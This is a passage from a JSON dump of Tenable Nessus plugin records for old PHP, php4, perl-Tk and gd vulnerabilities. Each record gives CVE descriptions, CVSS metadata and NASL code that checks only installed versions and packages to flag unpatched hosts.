or open_basedir functions.\n (CVE-2006-1017)\n\n - A buffer overflow exists in the sscanf function.\n (CVE-2006-4020)\n\n - The file_exists and imap_reopen functions do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings. (CVE-2006-4481)\n\n - Multiple heap-based buffer overflows exist in the str_repeat and wordwrap functions in ext/standard/string.c. (CVE-2006-4482)\n\n - The cURL extension files permit the CURLOPT_FOLLOWLOCATION option when open_basedir or safe_mode is enabled, which allows attackers to perform unauthorized actions. (CVE-2006-4483)\n\n - A buffer overflow vulnerability exists in the LWZReadByte_ function in ext/gd/libgd/gd_gif_in.c in the GD extension. (CVE-2006-4484)\n\n - The stripos function is affected by an out-of-bounds read. (CVE-2006-4485)", "edition": 5, "reporter": "Tenable", "published": "2011-11-18T00:00:00", "title": "PHP 5.1.x < 5.1.5 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-1017", "CVE-2006-4485", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_1_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17713", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17713);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2006-1017\",\n \"CVE-2006-4020\",\n \"CVE-2006-4481\",\n \"CVE-2006-4482\",\n \"CVE-2006-4483\",\n \"CVE-2006-4484\",\n \"CVE-2006-4485\"\n );\n script_bugtraq_id(16878, 19415, 19582);\n\n script_name(english:\"PHP 5.1.x < 5.1.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 5.x installed on the\nremote host is older than 5.1.5. Such versions may be affected by the\nfollowing vulnerabilities :\n\n - The c-client library 2000, 2001, or 2004 for PHP does\n not check the safe_mode or open_basedir functions.\n (CVE-2006-1017)\n\n - A buffer overflow exists in the sscanf function.\n (CVE-2006-4020)\n\n - The file_exists and imap_reopen functions do not check\n for the safe_mode and open_basedir settings, which \n allows local users to bypass the settings. \n (CVE-2006-4481)\n\n - Multiple heap-based buffer overflows exist in the\n str_repeat and wordwrap functions in \n ext/standard/string.c. (CVE-2006-4482)\n\n - The cURL extension files permit the\n CURLOPT_FOLLOWLOCATION option when open_basedir or\n safe_mode is enabled, which allows attackers to perform\n unauthorized actions. (CVE-2006-4483)\n\n - A buffer overflow vulnerability exists in the\n LWZReadByte_ function in ext/gd/libgd/gd_gif_in.c in the\n GD extension. (CVE-2006-4484)\n\n - The stripos function is affected by an out-of-bounds\n read. (CVE-2006-4485)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=38322\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_1_5.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.1.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version !~ \"^5\\.\") exit(0, \"The web server on port \"+port+\" uses PHP \"+version+\" rather than 5.x.\");\n\nif (version =~ \"^5\\.(0\\.|1\\.[0-4]([^0-9]|$))\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.1.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:32:53", "references": ["https://security-tracker.debian.org/tracker/CVE-2006-3017", "https://security-tracker.debian.org/tracker/CVE-2006-5465", "http://www.debian.org/security/2006/dsa-1206", "https://security-tracker.debian.org/tracker/CVE-2006-4482", "https://security-tracker.debian.org/tracker/CVE-2005-3353"], "pluginID": "23655", "description": "Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2005-3353 Tim Starling discovered that missing input sanitising in the EXIF module could lead to denial of service.\n\n - CVE-2006-3017 Stefan Esser discovered a security-critical programming error in the hashtable implementation of the internal Zend engine.\n\n - CVE-2006-4482 It was discovered that str_repeat() and wordwrap() functions perform insufficient checks for buffer boundaries on 64 bit systems, which might lead to the execution of arbitrary code.\n\n - CVE-2006-5465 Stefan Esser discovered a buffer overflow in the htmlspecialchars() and htmlentities(), which might lead to the execution of arbitrary code.", "edition": 6, "reporter": "Tenable", "published": "2006-11-20T00:00:00", "title": "Debian DSA-1206-1 : php4 - several vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2006-3017", "CVE-2006-4482", "CVE-2006-5465"], "modified": "2018-08-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:php4"], "id": "DEBIAN_DSA-1206.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23655", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1206. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23655);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-3353\", \"CVE-2006-3017\", \"CVE-2006-4482\", \"CVE-2006-5465\");\n script_xref(name:\"DSA\", value:\"1206\");\n\n script_name(english:\"Debian DSA-1206-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2005-3353\n Tim Starling discovered that missing input sanitising in\n the EXIF module could lead to denial of service.\n\n - CVE-2006-3017\n Stefan Esser discovered a security-critical programming\n error in the hashtable implementation of the internal\n Zend engine.\n\n - CVE-2006-4482\n It was discovered that str_repeat() and wordwrap()\n functions perform insufficient checks for buffer\n boundaries on 64 bit systems, which might lead to the\n execution of arbitrary code.\n\n - CVE-2006-5465\n Stefan Esser discovered a buffer overflow in the\n htmlspecialchars() and htmlentities(), which might lead\n to the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-5465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1206\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php4 packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-18. Builds for hppa and m68k will be provided later\nonce they are available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/11/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-php4\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache2-mod-php4\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cgi\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cli\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-common\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-curl\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-dev\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-domxml\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-gd\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-imap\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-ldap\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mcal\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mhash\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mysql\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-odbc\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-pear\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-recode\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-snmp\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-sybase\", reference:\"4:4.3.10-18\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-xslt\", reference:\"4:4.3.10-18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:33:21", "references": ["http://support.novell.com/security/cve/CVE-2006-5465.html"], "pluginID": "29376", "description": "This update fixes the following security problems in the PHP scripting language :\n\n - Various buffer overflows in htmlentities/htmlspecialchars internal routines could be used to crash the PHP interpreter or potentially execute code, depending on the PHP application used.\n (CVE-2006-5465)\n\n - A missing open_basedir check inside chdir() function was added.\n\n - A tempnam() openbasedir bypass was fixed.\n\n - A possible buffer overflow in stream_socket_client() when using 'bindto' + IPv6 was fixed.\n\n - Do not build php5 with --enable-sigchld.", "edition": 4, "reporter": "Tenable", "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : PHP (ZYPP Patch Number 2236)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5465"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-MOD_PHP5-2236.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29376", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29376);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2012/05/17 10:53:20 $\");\n\n script_cve_id(\"CVE-2006-5465\");\n\n script_name(english:\"SuSE 10 Security Update : PHP (ZYPP Patch Number 2236)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security problems in the PHP scripting\nlanguage :\n\n - Various buffer overflows in\n htmlentities/htmlspecialchars internal routines could be\n used to crash the PHP interpreter or potentially execute\n code, depending on the PHP application used.\n (CVE-2006-5465)\n\n - A missing open_basedir check inside chdir() function was\n added.\n\n - A tempnam() openbasedir bypass was fixed.\n\n - A possible buffer overflow in stream_socket_client()\n when using 'bindto' + IPv6 was fixed.\n\n - Do not build php5 with --enable-sigchld.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-5465.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"apache2-mod_php5-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-bcmath-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-curl-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-dba-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-devel-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-dom-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-exif-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-fastcgi-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-ftp-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-gd-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-iconv-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-imap-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-ldap-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-mbstring-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-mysql-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-mysqli-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-pdo-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-pear-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-pgsql-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-soap-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-wddx-5.1.2-29.22\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"php5-xmlrpc-5.1.2-29.22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:55", "references": [], "pluginID": "36248", "description": "A vulnerability in perl-Tk was found where specially crafted GIF images could crash perl-Tk (an identical issue to that found in php-gd, gd, and SDL_image).\n\nThe updated packages have been patched to correct this issue.", "edition": 6, "reporter": "Tenable", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : perl-Tk (MDVSA-2008:077)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:perl-Tk-devel", "p-cpe:/a:mandriva:linux:perl-Tk-doc", "cpe:/o:mandriva:linux:2007", "cpe:/o:mandriva:linux:2007.1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:perl-Tk"], "id": "MANDRIVA_MDVSA-2008-077.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36248", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:077. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36248);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\"CVE-2006-4484\");\n script_bugtraq_id(19582);\n script_xref(name:\"MDVSA\", value:\"2008:077\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl-Tk (MDVSA-2008:077)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability in perl-Tk was found where specially crafted GIF\nimages could crash perl-Tk (an identical issue to that found in\nphp-gd, gd, and SDL_image).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected perl-Tk, perl-Tk-devel and / or perl-Tk-doc\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Tk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Tk-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"perl-Tk-804.027-7.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"perl-Tk-devel-804.027-7.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"perl-Tk-doc-804.027-7.1mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", reference:\"perl-Tk-804.027-7.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"perl-Tk-devel-804.027-7.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"perl-Tk-doc-804.027-7.1mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", reference:\"perl-Tk-804.027-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"perl-Tk-devel-804.027-7.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"perl-Tk-doc-804.027-7.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:42", "references": [], "pluginID": "37016", "description": "Buffer overflow in the LWZReadByte() function in gd_gif_in.c in GD prior to 2.0.34 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array.\n\nThis was originally fixed in PHP's embedded GD with MDKSA-2006:162;\npatches had not been applied to the system libgd at that time.\n\nThe updated packages have been patched to correct this issue.", "edition": 6, "reporter": "Tenable", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : gd (MDVSA-2008:038)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4484"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64gd2", "cpe:/o:mandriva:linux:2007", "p-cpe:/a:mandriva:linux:lib64gd2-devel", "p-cpe:/a:mandriva:linux:lib64gd2-static-devel", "p-cpe:/a:mandriva:linux:libgd2-devel", "p-cpe:/a:mandriva:linux:gd-utils", "p-cpe:/a:mandriva:linux:libgd2", "p-cpe:/a:mandriva:linux:libgd2-static-devel"], "id": "MANDRIVA_MDVSA-2008-038.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37016", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:038. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37016);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\"CVE-2006-4484\");\n script_bugtraq_id(19582);\n script_xref(name:\"MDVSA\", value:\"2008:038\");\n\n script_name(english:\"Mandriva Linux Security Advisory : gd (MDVSA-2008:038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow in the LWZReadByte() function in gd_gif_in.c in GD\nprior to 2.0.34 allows remote attackers to have an unknown impact via\na GIF file with input_code_size greater than MAX_LWZ_BITS, which\ntriggers an overflow when initializing the table array.\n\nThis was originally fixed in PHP's embedded GD with MDKSA-2006:162;\npatches had not been applied to the system libgd at that time.\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gd-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gd2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gd2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gd2-static-devel\");\n script_set_attribute(attribute:\"cpe\", 